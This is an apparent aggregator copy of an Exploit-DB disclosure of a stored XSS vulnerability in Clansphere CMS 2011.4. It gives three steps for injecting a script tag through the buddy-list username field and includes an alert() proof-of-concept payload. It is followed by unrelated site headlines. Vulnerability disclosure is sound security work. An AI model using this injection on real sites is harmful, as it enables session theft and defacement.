[webapps] Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

1 year ago

source link: https://www.exploit-db.com/exploits/51070
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

EDB-ID:

51070

EDB Verified:

Exploit:

Platform:

PHP

Date:

2023-03-27

Vulnerable App:

# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)
# Exploit Author: Sinem Şahin
# Date: 2022-10-08
# Vendor Homepage: https://www.csphere.eu/
# Version: 2011.4
# Tested on: Windows & XAMPP

==> Tutorial <==

1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872
2- Write XSS Payload into the username of the buddy list create.
3- Press "Save" button.

XSS Payload ==> "<script>alert("usernameXSS")</script> 

Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md

Copy

Recommend

[webapps] Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS)

EDB-ID:

51070

Platform:

PHP

Date:

2023-03-27

Recommend

[webapps] Zoneminder < v1.37.24 - Log Injection & Stored XSS & CSRF B...

First Citizens Bank to buy Silicon Valley Bridge Bank

拉踩BBA：李想的垫脚石，理想的拦路虎

Ranked: Here Are the Top CEOs in Greece, 2023

2023年中国文化旅游行业国内需求现状分析出游半径或将扩大【组图】

Full Stack Software Engineer

一文搞懂Linux系统内核的重要性

US CFTC sues Binance and CEO Changpeng Zhao

Apple Has New Hardware, But When Is The Next Announcement Event?

Discover the best smartphones for photography in 2023

About Joyk